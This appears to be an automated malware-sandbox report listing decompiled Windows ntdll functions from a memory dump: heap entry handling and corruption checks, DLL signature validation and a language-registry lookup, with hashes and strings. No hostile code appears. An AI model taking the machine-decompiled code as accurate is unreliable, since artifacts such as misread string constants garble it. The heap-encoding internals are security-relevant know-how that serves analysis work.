Opcode ID: 808729af16446026e95c5f9b8008bc4e3c40a80b8de7aaf7e2112e095269bcd6
Instruction ID: dd164645fdb93a596bcb963a398e40107ce5fceb6d8c97dfc75fdf1785b74f48
Opcode Fuzzy Hash: 808729af16446026e95c5f9b8008bc4e3c40a80b8de7aaf7e2112e095269bcd6
Instruction Fuzzy Hash: 72812532604A94EFD726CB68DC84BAABBF8FF05320F1401A5E551DB692D778ED40EB11

Uniqueness

Uniqueness Score: -1.00%

Function 00F1B73D, Relevance: 3.9, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00F1B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E00FBA80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0xfe8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E00EFB150();
					} else {
						E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E00EFB150();
					__eflags =  *0xfe7bc8;
					if(__eflags == 0) {
						E00FB2073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E00FBA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0xfe8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0xfe8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E00F1B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E00FBA80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E00F1E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}

0x00f1b746
0x00f1b74b
0x00f1b74d
0x00f1b750
0x00f1b755
0x00f1b758
0x00f1b758
0x00f1b75e
0x00f1b763
0x00f1b764
0x00f1b76a
0x00f1b76d
0x00f1b771
0x00f1b776
0x00f1b85c
0x00f1b85d
0x00f1b860
0x00f1b865
0x00f62ba1
0x00f62ba2
0x00f62ba9
0x00f62bae
0x00f62bae
0x00f1b77c
0x00f1b77c
0x00f1b77c
0x00f1b785
0x00f1b788
0x00f62bb6
0x00f62bb9
0x00000000
0x00000000
0x00f62bbf
0x00f62bc5
0x00f62bc9
0x00f62be8
0x00f62bed
0x00f62bcb
0x00f62be0
0x00f62be5
0x00f62bf3
0x00f62bf8
0x00f62bfd
0x00f62c05
0x00f62c0e
0x00f62c0e
0x00000000
0x00f1b78e
0x00f1b78e
0x00f1b78e
0x00f1b791
0x00f1b791
0x00f1b797
0x00f1b797
0x00f1b79f
0x00f1b7a9
0x00f1b7af
0x00f1b7af
0x00f1b7b1
0x00f1b7b6
0x00f1b7e2
0x00f1b7e2
0x00f1b7e7
0x00f1b880
0x00f1b7ed
0x00f1b7ed
0x00f1b7ed
0x00f1b7ef
0x00f1b7f2
0x00f1b7f2
0x00f1b7f5
0x00f1b7fa
0x00f62c2d
0x00f62c2e
0x00f62c39
0x00f1b800
0x00f1b800
0x00f1b802
0x00f1b805
0x00f1b808
0x00f1b808
0x00f1b80a
0x00f1b80d
0x00f1b816
0x00f1b81c
0x00f1b822
0x00f1b82f
0x00f1b88b
0x00f1b892
0x00f1b897
0x00f1b899
0x00f1b89b
0x00f1b89e
0x00f1b8a5
0x00f1b8a8
0x00f1b8aa
0x00f1b8ac
0x00f1b8ac
0x00f1b8aa
0x00f1b892
0x00f1b831
0x00f1b839
0x00f1b83b
0x00f1b83b
0x00f1b844
0x00f1b84b
0x00f1b852
0x00f1b7b8
0x00f1b7ba
0x00f1b7bf
0x00f1b7c4
0x00f62c18
0x00f62c19
0x00f62c23
0x00f1b7ca
0x00f1b7ca
0x00f1b7cc
0x00f1b7cf
0x00f1b7d1
0x00f1b7d1
0x00f1b7d4
0x00f1b7dc
0x00f1b8bb
0x00f1b8bb
0x00f1b8be
0x00f1b8be
0x00f1b8c1
0x00000000
0x00000000
0x00f1b8c3
0x00f1b8c5
0x00f1b8c7
0x00f1b8e0
0x00000000
0x00f1b8e0
0x00f1b8cc
0x00f1b8cc
0x00000000
0x00f1b8cc
0x00f1b8d6
0x00f1b8d6
0x00000000
0x00f1b7dc
0x00f1b7b6

Strings

HEAP[%wZ]: , xrefs: 00F62BDB
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 00F62BF3
HEAP: , xrefs: 00F62BE8

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: e4728d77301213e3eef5ee1e301abfd2831864097fb57de564d0250d84f6919b
Instruction ID: 51667e79dc2bc11360dcad565c7b59e1c3e62a0ef997c640229ccc7915abeca2
Opcode Fuzzy Hash: e4728d77301213e3eef5ee1e301abfd2831864097fb57de564d0250d84f6919b
Instruction Fuzzy Hash: C561E571A00345DFDB18DF24C885BAABBE5FF44724F24855EE8498F291D734E882EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F07E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00F07E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00F0CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | L"id volume label has been specified.\r\n";
					_t124 = E00EFC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xfe5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00F75510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xfe5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & L"id volume label has been specified.\r\n") != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00F17D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00F17D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00F77016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00F17D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00F17D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00F77016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00F2A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00EFB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x00f07e4c
0x00f07e50
0x00f07e55
0x00f07e58
0x00f07e5d
0x00f07e71
0x00f07f33
0x00f07e77
0x00f07e77
0x00f07e79
0x00f07e79
0x00f07e7e
0x00f07f45
0x00f59848
0x00000000
0x00f59848
0x00f07f4e
0x00f07f53
0x00f07f5a
0x00000000
0x00000000
0x00f5985a
0x00f59862
0x00f59866
0x00000000
0x00f5986c
0x00000000
0x00f5986c
0x00f07e84
0x00f07e84
0x00f07e8d
0x00f59871
0x00f07eb8
0x00f07ec0
0x00f07ec0
0x00f07e9a
0x00f5987e
0x00000000
0x00000000
0x00f59884
0x00f5988b
0x00f598a7
0x00f598ac
0x00f598b1
0x00f598b6
0x00f598b8
0x00f598b8
0x00f598b9
0x00000000
0x00f598b9
0x00f07ea0
0x00f07ea7
0x00000000
0x00000000
0x00f07eac
0x00f07eb1
0x00f07ec6
0x00f07ed0
0x00f598cc
0x00f07ed6
0x00f07ed6
0x00f07ed6
0x00f07ede
0x00f07ee3
0x00f598e3
0x00f598f0
0x00f59902
0x00f598f2
0x00f598fb
0x00f598fb
0x00f59907
0x00f5991d
0x00f5991d
0x00f59907
0x00f598e3
0x00f07ef0
0x00f07f14
0x00f07f14
0x00f07f1e
0x00f59946
0x00f07f24
0x00f07f24
0x00f07f24
0x00f07f2c
0x00f5996a
0x00f59975
0x00f59975
0x00f5997e
0x00f59993
0x00f59993
0x00f5997e
0x00000000
0x00f07ef2
0x00f07efc
0x00f07f0a
0x00f07f0e
0x00f59933
0x00000000
0x00f59933
0x00000000
0x00f07f0e
0x00000000
0x00000000
0x00000000
0x00f07eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 00F598A2
LdrpCompleteMapModule, xrefs: 00F59898
Could not validate the crypto signature for DLL %wZ, xrefs: 00F59891

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 384f9d7f5ff67affd7d77dca894654accf56c5be0208d9e3e058065ceb373969
Instruction ID: 05b6e57f536153baf195da1d1549e085c0c65ad1424daaf384a52be2e79bc866
Opcode Fuzzy Hash: 384f9d7f5ff67affd7d77dca894654accf56c5be0208d9e3e058065ceb373969
Instruction Fuzzy Hash: 6F510032E09745DBDB25EB58C944B2A7BE4AB01324F1405D9E9519B3D2C7B4FD00FB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FA23E3, Relevance: 3.9, Strings: 3, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00FA23E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0xfe874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0xfe874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E00F4D4F0(_t83, 0xed6c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00EFB150();
					} else {
						E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E00EFB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xfe6378 = 1;
						asm("int3");
						 *0xfe6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x00fa23e3
0x00fa23e8
0x00fa23eb
0x00fa23ee
0x00fa23f3
0x00fa259b
0x00fa259b
0x00fa259d
0x00fa25a3
0x00fa25a3
0x00fa23fb
0x00fa2424
0x00fa244f
0x00fa2460
0x00fa2451
0x00fa2451
0x00fa2456
0x00fa2458
0x00fa2458
0x00fa245b
0x00fa245b
0x00fa2426
0x00fa2431
0x00fa2436
0x00fa2443
0x00fa2438
0x00fa2438
0x00fa2438
0x00fa2445
0x00fa2445
0x00fa2463
0x00fa2469
0x00fa246f
0x00fa2480
0x00fa2495
0x00fa24a1
0x00fa24ce
0x00fa24df
0x00fa24d0
0x00fa24d0
0x00fa24d5
0x00fa24d7
0x00fa24d7
0x00fa24da
0x00fa24da
0x00fa24a3
0x00fa24b0
0x00fa24b5
0x00fa24c2
0x00fa24b7
0x00fa24b7
0x00fa24b7
0x00fa24c4
0x00fa24c4
0x00fa24e8
0x00fa2497
0x00fa249a
0x00fa249a
0x00fa2482
0x00fa2488
0x00fa2488
0x00fa2471
0x00fa2479
0x00fa2479
0x00fa24ef
0x00fa23fd
0x00fa2401
0x00fa2412
0x00fa2403
0x00fa2403
0x00fa2408
0x00fa240a
0x00fa240a
0x00fa240d
0x00fa240d
0x00fa241b
0x00fa241b
0x00fa24f1
0x00fa24f6
0x00fa2507
0x00fa2510
0x00000000
0x00fa2510
0x00fa250b
0x00000000
0x00fa24f8
0x00fa24f8
0x00fa24fc
0x00fa2500
0x00fa2512
0x00fa2515
0x00fa251a
0x00fa2521
0x00fa2524
0x00fa2529
0x00fa252f
0x00000000
0x00000000
0x00fa253c
0x00fa255c
0x00fa2561
0x00fa253e
0x00fa2554
0x00fa2559
0x00fa256a
0x00fa256d
0x00fa2574
0x00fa2586
0x00fa2588
0x00fa258f
0x00fa2590
0x00fa2590
0x00fa2597
0x00000000
0x00fa2597

Strings

HEAP[%wZ]: , xrefs: 00FA254F
Heap block at %p modified at %p past requested size of %Ix, xrefs: 00FA256F
HEAP: , xrefs: 00FA255C

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 2f502c87474da0cdaf7a1c0165050b3b73f005f93f225d11f11dbe5048521f66
Instruction ID: 160c1e450adfcde46ea0d0fcf64c3e08e405bd16e43f0d81381902797467dd1b
Opcode Fuzzy Hash: 2f502c87474da0cdaf7a1c0165050b3b73f005f93f225d11f11dbe5048521f66
Instruction Fuzzy Hash: 5551E1B5B002608EE3A4CB2EC85477277E1EB4A754F64485AECC68B286D735D847FB20

Uniqueness

Uniqueness Score: -1.00%

Function 00EFE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00EFE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00EFF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00F395D0();
						}
						if(_t78 != 0) {
							L00F177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00F3FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00F3BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00F39600();
					if(_t97 < 0) {
						goto L6;
					}
					E00F3BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00EFF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00F3BB40(_t83, _t102 + 0x24, _t78);
								if(L00F043C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00F3BB40(_t84, _t102 + 0x24, _t94);
									if(L00F043C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x00efe620
0x00efe628
0x00efe62f
0x00efe631
0x00efe635
0x00efe637
0x00efe63e
0x00f55503
0x00f55503
0x00efe64c
0x00efe64c
0x00efe651
0x00000000
0x00000000
0x00efe661
0x00efe665
0x00f5542a
0x00efe715
0x00efe71a
0x00efe71c
0x00efe720
0x00efe720
0x00efe727
0x00efe736
0x00efe736
0x00efe743
0x00efe743
0x00efe673
0x00efe678
0x00efe67d
0x00efe682
0x00efe685
0x00efe692
0x00efe69b
0x00efe6a3
0x00efe6ad
0x00efe6b1
0x00efe6b2
0x00efe6bb
0x00efe6bf
0x00efe6c0
0x00efe6c8
0x00efe6cc
0x00efe6d5
0x00efe6d9
0x00000000
0x00000000
0x00efe6e5
0x00efe6ea
0x00efe6f9
0x00efe70b
0x00efe70f
0x00f55439
0x00f5545e
0x00f5545e
0x00000000
0x00f5545e
0x00f5543b
0x00f5543e
0x00f55440
0x00f55445
0x00f55472
0x00f55475
0x00f5548d
0x00f55493
0x00f554a9
0x00000000
0x00000000
0x00f554ab
0x00f554b4
0x00f554bc
0x00f554c8
0x00f554de
0x00f554fb
0x00f554e0
0x00f554e6
0x00f554eb
0x00f554eb
0x00f554de
0x00000000
0x00f554bc
0x00f55477
0x00f5547a
0x00f55480
0x00f55483
0x00f55486
0x00f5548b
0x00000000
0x00000000
0x00000000
0x00f5548b
0x00000000
0x00000000
0x00000000
0x00000000
0x00f55447
0x00f55447
0x00f55447
0x00f55447
0x00f5544e
0x00000000
0x00000000
0x00f55450
0x00f55452
0x00f55455
0x00f5545a
0x00000000
0x00000000
0x00000000
0x00f5545c
0x00f5546a
0x00f5546d
0x00f5546f
0x00000000
0x00f5546f
0x00efe70f

Strings

InstallLanguageFallback, xrefs: 00EFE6DB
@, xrefs: 00EFE6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00EFE68C

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 5efd82efcf6092d7b8445e137a48b6d765f1c6453b5beb8b79356b6e0f815f7c
Instruction ID: 77ad1b59b69fee0320415a6a26fe1b014d0cd4034e20930d2aab7fa63ffb63e6
Opcode Fuzzy Hash: 5efd82efcf6092d7b8445e137a48b6d765f1c6453b5beb8b79356b6e0f815f7c
Instruction Fuzzy Hash: C15183729087459BC714DF64C460A7BB3E8AF88725F05092EFA85E7250FB34DD48D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00F1EB9A, Relevance: 3.9, Strings: 3, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E00F1EB9A(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
